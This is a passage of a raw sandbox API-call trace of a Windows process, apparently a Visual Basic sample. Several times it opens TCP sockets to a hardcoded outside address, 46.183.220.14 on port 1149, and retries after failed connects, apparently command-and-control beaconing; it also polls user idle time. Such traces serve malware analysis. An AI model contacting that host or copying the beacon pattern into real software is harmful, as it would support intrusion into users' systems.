pptlib=0x30f314*=0x0 | out: pptlib=0x30f314*=0x6e4020) returned 0x0 [0205.053] IUnknown:AddRef (This=0x6e4020) returned 0x2 [0205.053] ITypeLib:GetTypeInfoOfGuid (in: This=0x6e4020, guid=0x7296e620, ppTInfo=0x30f310 | out: ppTInfo=0x30f310*=0x6e4d94) returned 0x0 [0205.053] IUnknown:Release (This=0x6e4020) returned 0x2 [0205.053] ITypeInfo:LocalInvoke (This=0x6e4d94) returned 0x0 [0205.054] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.054] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76450000 [0205.054] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.055] GetProcAddress (hModule=0x76450000, lpProcName="socket") returned 0x76453eb8 [0205.055] socket (af=2, type=1, protocol=6) returned 0x188 [0205.061] GetLastError () returned 0x0 [0205.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=8, lpMultiByteStr=0x30f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 8 [0205.061] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.061] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76450000 [0205.061] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.061] GetProcAddress (hModule=0x76450000, lpProcName="connect") returned 0x76456bdd [0205.061] connect (s=0x188, name=0x30f5d8*(sa_family=2, sin_port=0x47d, sin_addr="46.183.220.14"), namelen=16) returned -1 [0206.328] GetLastError () returned 0x274d [0206.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f5e0, cbMultiByte=8, lpWideCharStr=0x30f5f8, cchWideChar=8 | out: lpWideCharStr="") returned 8 [0206.328] SetErrorMode (uMode=0x8001) returned 0x8001 [0206.328] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76450000 [0206.328] SetErrorMode (uMode=0x8001) returned 0x8001 [0206.328] GetProcAddress (hModule=0x76450000, lpProcName="closesocket") returned 0x76453918 [0206.328] closesocket (s=0x188) returned 0 [0206.328] GetLastError () returned 0x0 [0206.328] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x1388, lpTimerFunc=0x6d2070) returned 0x7fbb [0206.329] GetLastError () returned 0x0 [0206.329] GetCurrentThreadId () returned 0xf0 [0206.329] GetCurrentThreadId () returned 0xf0 [0206.329] PostThreadMessageA (idThread=0xf0, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0206.329] GetCurrentProcessId () returned 0x35c [0206.329] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.330] IsWindow (hWnd=0x50276) returned 1 [0206.330] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0206.330] GetParent (hWnd=0x50276) returned 0x0 [0206.330] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.330] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.330] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc176, wParam=0x52, lParam=0x1) returned 0x0 [0206.330] GetLastError () returned 0x0 [0206.330] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.330] IsWindow (hWnd=0x202e0) returned 1 [0206.330] GetWindowLongA (hWnd=0x202e0, nIndex=-16) returned 79691776 [0206.330] GetParent (hWnd=0x202e0) returned 0x0 [0206.330] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.330] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.330] CallWindowProcA (lpPrevWndFunc=0x77e9abc8, hWnd=0x202e0, Msg=0xc176, wParam=0x52, lParam=0x1) returned 0x0 [0206.330] GetLastError () returned 0x0 [0206.330] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.330] IsWindow (hWnd=0x802c4) returned 1 [0206.330] GetWindowLongA (hWnd=0x802c4, nIndex=-16) returned -2080374784 [0206.330] GetParent (hWnd=0x802c4) returned 0x0 [0206.330] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.330] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.330] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0xc176, wParam=0x52, lParam=0x1) returned 0x0 [0206.331] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.331] IsWindow (hWnd=0x702de) returned 1 [0206.331] GetWindowLongA (hWnd=0x702de, nIndex=-16) returned -2079784960 [0206.331] GetParent (hWnd=0x702de) returned 0x0 [0206.331] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.331] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.331] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0xc176, wParam=0x52, lParam=0x1) returned 0x0 [0206.331] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.331] IsWindow (hWnd=0x50276) returned 1 [0206.331] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0206.331] GetParent (hWnd=0x50276) returned 0x0 [0206.331] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.331] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.331] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0206.331] GetLastError () returned 0x0 [0206.331] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.331] IsWindow (hWnd=0x202e0) returned 1 [0206.331] GetWindowLongA (hWnd=0x202e0, nIndex=-16) returned 79691776 [0206.331] GetParent (hWnd=0x202e0) returned 0x0 [0206.331] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.331] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.331] CallWindowProcA (lpPrevWndFunc=0x77e9abc8, hWnd=0x202e0, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0206.331] GetLastError () returned 0x0 [0206.332] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.332] IsWindow (hWnd=0x802c4) returned 1 [0206.332] GetWindowLongA (hWnd=0x802c4, nIndex=-16) returned -2080374784 [0206.332] GetParent (hWnd=0x802c4) returned 0x0 [0206.332] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.332] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.332] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0206.332] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.332] IsWindow (hWnd=0x702de) returned 1 [0206.332] GetWindowLongA (hWnd=0x702de, nIndex=-16) returned -2079784960 [0206.332] GetParent (hWnd=0x702de) returned 0x0 [0206.332] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.332] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.332] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0206.332] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.332] IsWindow (hWnd=0x50276) returned 1 [0206.332] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0206.332] GetParent (hWnd=0x50276) returned 0x0 [0206.332] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.332] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.332] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x5029e) returned 0x0 [0206.332] GetLastError () returned 0x0 [0206.332] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.332] IsWindow (hWnd=0x50276) returned 1 [0206.333] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0206.333] GetParent (hWnd=0x50276) returned 0x0 [0206.333] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.333] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.333] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x502c2) returned 0x0 [0206.333] GetLastError () returned 0x0 [0206.333] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0206.333] TranslateMessage (lpMsg=0x30fb80) returned 0 [0206.333] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0206.333] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0206.333] GetTickCount () returned 0x38c85 [0206.333] GetTickCount () returned 0x38c85 [0206.333] GetTickCount () returned 0x38c85 [0206.333] CoFreeUnusedLibraries () [0206.333] GetTickCount () returned 0x38c85 [0206.333] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0206.333] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0206.333] WaitMessage () returned 1 [0207.401] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0207.401] IsWindow (hWnd=0x50276) returned 1 [0207.401] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0207.401] GetParent (hWnd=0x50276) returned 0x0 [0207.401] TranslateMessage (lpMsg=0x30fb80) returned 0 [0207.401] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0207.401] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0207.401] GetLastError () returned 0x0 [0207.402] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0207.402] IsWindow (hWnd=0x202e0) returned 1 [0207.402] GetWindowLongA (hWnd=0x202e0, nIndex=-16) returned 79691776 [0207.402] GetParent (hWnd=0x202e0) returned 0x0 [0207.402] TranslateMessage (lpMsg=0x30fb80) returned 0 [0207.402] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0207.402] CallWindowProcA (lpPrevWndFunc=0x77e9abc8, hWnd=0x202e0, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0207.402] GetLastError () returned 0x0 [0207.402] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0207.402] IsWindow (hWnd=0x802c4) returned 1 [0207.402] GetWindowLongA (hWnd=0x802c4, nIndex=-16) returned -2080374784 [0207.402] GetParent (hWnd=0x802c4) returned 0x0 [0207.402] TranslateMessage (lpMsg=0x30fb80) returned 0 [0207.402] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0207.402] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0207.402] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0207.402] IsWindow (hWnd=0x702de) returned 1 [0207.402] GetWindowLongA (hWnd=0x702de, nIndex=-16) returned -2079784960 [0207.402] GetParent (hWnd=0x702de) returned 0x0 [0207.402] TranslateMessage (lpMsg=0x30fb80) returned 0 [0207.402] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0207.404] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0207.404] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0207.404] IsWindow (hWnd=0x50276) returned 1 [0207.404] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0207.404] GetParent (hWnd=0x50276) returned 0x0 [0207.404] TranslateMessage (lpMsg=0x30fb80) returned 0 [0207.404] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0207.404] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0207.404] GetLastError () returned 0x0 [0207.405] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0207.405] IsWindow (hWnd=0x202e0) returned 1 [0207.405] GetWindowLongA (hWnd=0x202e0, nIndex=-16) returned 79691776 [0207.405] GetParent (hWnd=0x202e0) returned 0x0 [0207.405] TranslateMessage (lpMsg=0x30fb80) returned 0 [0207.405] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0207.405] CallWindowProcA (lpPrevWndFunc=0x77e9abc8, hWnd=0x202e0, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0207.405] GetLastError () returned 0x0 [0207.405] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0207.405] IsWindow (hWnd=0x802c4) returned 1 [0207.405] GetWindowLongA (hWnd=0x802c4, nIndex=-16) returned -2080374784 [0207.405] GetParent (hWnd=0x802c4) returned 0x0 [0207.405] TranslateMessage (lpMsg=0x30fb80) returned 0 [0207.405] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0207.405] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0207.405] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0207.405] IsWindow (hWnd=0x702de) returned 1 [0207.405] GetWindowLongA (hWnd=0x702de, nIndex=-16) returned -2079784960 [0207.405] GetParent (hWnd=0x702de) returned 0x0 [0207.405] TranslateMessage (lpMsg=0x30fb80) returned 0 [0207.406] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0207.406] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0xc176, wParam=0x50, lParam=0x0) returned 0x0 [0207.406] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0207.406] GetTickCount () returned 0x390ba [0207.406] GetTickCount () returned 0x390ba [0207.406] GetTickCount () returned 0x390ba [0207.406] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0207.406] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0207.406] WaitMessage () returned 1 [0210.716] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0210.716] IsWindow (hWnd=0x50276) returned 1 [0210.716] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0210.716] GetParent (hWnd=0x50276) returned 0x0 [0210.716] TranslateMessage (lpMsg=0x30fb80) returned 0 [0210.716] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0210.716] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x202e8) returned 0x0 [0210.716] GetLastError () returned 0x0 [0210.716] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0210.716] GetTickCount () returned 0x39da5 [0210.716] GetTickCount () returned 0x39da5 [0210.716] GetTickCount () returned 0x39da5 [0210.716] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0210.716] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0210.716] WaitMessage () returned 1 [0210.718] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0210.718] IsWindow (hWnd=0x50276) returned 1 [0210.718] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0210.718] GetParent (hWnd=0x50276) returned 0x0 [0210.718] TranslateMessage (lpMsg=0x30fb80) returned 0 [0210.718] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0210.718] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x202ea) returned 0x0 [0210.718] GetLastError () returned 0x0 [0210.718] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0210.718] GetTickCount () returned 0x39da5 [0210.718] GetTickCount () returned 0x39da5 [0210.718] GetTickCount () returned 0x39da5 [0210.718] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0210.718] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0210.718] WaitMessage () returned 1 [0211.334] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0211.335] TranslateMessage (lpMsg=0x30fb80) returned 0 [0211.335] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0211.335] GetCurrentProcessId () returned 0x35c [0211.335] PeekMessageA (in: lpMsg=0x30f8c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30f8c8) returned 0 [0211.335] GetTickCount () returned 0x3a015 [0211.335] GetTickCount () returned 0x3a015 [0211.335] GetTickCount () returned 0x3a015 [0211.335] GetTickCount () returned 0x3a015 [0211.335] IsWindowVisible (hWnd=0x20286) returned 0 [0211.335] Sleep (dwMilliseconds=0x0) [0211.335] Sleep (dwMilliseconds=0x1) [0211.349] GetLastError () returned 0x0 [0211.350] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0211.350] IMalloc:Alloc (This=0x75e366bc, cb=0x4b) returned 0x6d2df8 [0211.350] DispCallFunc (pvInstance=0x6cfda0, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x1, prgvt=0x6d2e40, prgpvarg=0x6d2e38, pvargResult=0x30f810) returned 0x0 [0211.350] GetUserDefaultLCID () returned 0x409 [0211.350] VarI4FromStr (in: strIn="1149", lcid=0x409, dwFlags=0x0, plOut=0x30edd0 | out: plOut=0x30edd0) returned 0x0 [0211.350] htons (hostshort=0x47d) returned 0x7d04 [0211.350] GetLastError () returned 0x0 [0211.351] SysStringLen (param_1="46.183.220.14") returned 0xd [0211.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="46.183.220.14", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.351] inet_addr (cp="46.183.220.14") returned 0xedcb72e [0211.351] GetLastError () returned 0x0 [0211.351] SysStringByteLen (bstr="㘴ㄮ㌸㈮〲ㄮ4") returned 0xd [0211.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2614, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0211.351] ITypeInfo:LocalInvoke (This=0x6e4d94) returned 0x0 [0211.351] socket (af=2, type=1, protocol=6) returned 0x188 [0211.351] GetLastError () returned 0x0 [0211.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=8, lpMultiByteStr=0x30ed14, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 8 [0211.351] connect (s=0x188, name=0x30ed0c*(sa_family=2, sin_port=0x47d, sin_addr="46.183.220.14"), namelen=16) returned -1 [0212.538] GetLastError () returned 0x274d [0212.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30ed14, cbMultiByte=8, lpWideCharStr=0x30ed2c, cchWideChar=8 | out: lpWideCharStr="") returned 8 [0212.538] closesocket (s=0x188) returned 0 [0212.538] GetLastError () returned 0x0 [0212.539] IMalloc:Free (This=0x75e366bc, pv=0x6d2df8) [0212.539] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0212.539] TranslateMessage (lpMsg=0x30fb80) returned 0 [0212.539] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0212.539] GetCurrentProcessId () returned 0x35c [0212.539] PeekMessageA (in: lpMsg=0x30f8c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30f8c8) returned 0 [0212.539] GetTickCount () returned 0x3a4c6 [0212.539] GetTickCount () returned 0x3a4c6 [0212.539] GetTickCount () returned 0x3a4c6 [0212.539] GetTickCount () returned 0x3a4c6 [0212.539] IsWindowVisible (hWnd=0x20286) returned 0 [0212.539] Sleep (dwMilliseconds=0x0) [0212.551] Sleep (dwMilliseconds=0x1) [0212.569] GetLastError () returned 0x0 [0212.569] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0212.569] IMalloc:Alloc (This=0x75e366bc, cb=0x4b) returned 0x6d2df8 [0212.569] DispCallFunc (pvInstance=0x6cfda8, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x1, prgvt=0x6d2e40, prgpvarg=0x6d2e38, pvargResult=0x30f810) returned 0x0 [0212.569] SetErrorMode (uMode=0x8001) returned 0x8001 [0212.570] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0212.570] SetErrorMode (uMode=0x8001) returned 0x8001 [0212.570] GetProcAddress (hModule=0x77820000, lpProcName="GetLastInputInfo") returned 0x7784b382 [0212.570] GetLastInputInfo (in: plii=0x30ee94 | out: plii=0x30ee94) returned 1 [0212.570] GetLastError () returned 0x0 [0212.570] SetErrorMode (uMode=0x8001) returned 0x8001 [0212.570] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0212.570] SetErrorMode (uMode=0x8001) returned 0x8001 [0212.570] GetProcAddress (hModule=0x76220000, lpProcName="GetTickCount") returned 0x7623110c [0212.570] GetTickCount () returned 0x3a4e5 [0212.570] GetLastError () returned 0x0 [0212.570] GetUserDefaultLCID () returned 0x409 [0212.571] VarBstrFromI4 (in: lIn=5, lcid=0x409, dwFlags=0x0, pbstrOut=0x30ee74 | out: pbstrOut=0x30ee74*="5") returned 0x0 [0212.571] GetUserDefaultLCID () returned 0x409 [0212.571] VarBstrFromI4 (in: lIn=300, lcid=0x409, dwFlags=0x0, pbstrOut=0x30ee70 | out: pbstrOut=0x30ee70*="300") returned 0x0 [0212.571] GetUserDefaultLCID () returned 0x409 [0212.571] VarBstrFromI4 (in: lIn=2, lcid=0x409, dwFlags=0x0, pbstrOut=0x30ee70 | out: pbstrOut=0x30ee70*="2") returned 0x0 [0212.572] IMalloc:Free (This=0x75e366bc, pv=0x6d2df8) [0212.572] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0212.572] GetTickCount () returned 0x3a4e5 [0212.572] GetTickCount () returned 0x3a4e5 [0212.572] GetTickCount () returned 0x3a4e5 [0212.572] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0212.572] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0212.572] WaitMessage () returned 1 [0213.494] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0213.494] IsWindow (hWnd=0x50276) returned 1 [0213.494] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0213.494] GetParent (hWnd=0x50276) returned 0x0 [0213.494] TranslateMessage (lpMsg=0x30fb80) returned 0 [0213.494] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0213.494] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x40220) returned 0x0 [0213.494] GetLastError () returned 0x0 [0213.494] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0213.494] GetTickCount () returned 0x3a87e [0213.494] GetTickCount () returned 0x3a87e [0213.494] GetTickCount () returned 0x3a87e [0213.494] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0213.494] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0213.494] WaitMessage () returned 1 [0214.096] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0214.096] IsWindow (hWnd=0x50276) returned 1 [0214.096] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0214.096] GetParent (hWnd=0x50276) returned 0x0 [0214.096] TranslateMessage (lpMsg=0x30fb80) returned 0 [0214.096] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0214.096] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x602c2) returned 0x0 [0214.096] GetLastError () returned 0x0 [0214.097] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0214.097] GetTickCount () returned 0x3aade [0214.097] GetTickCount () returned 0x3aade [0214.097] GetTickCount () returned 0x3aade [0214.097] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0214.097] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 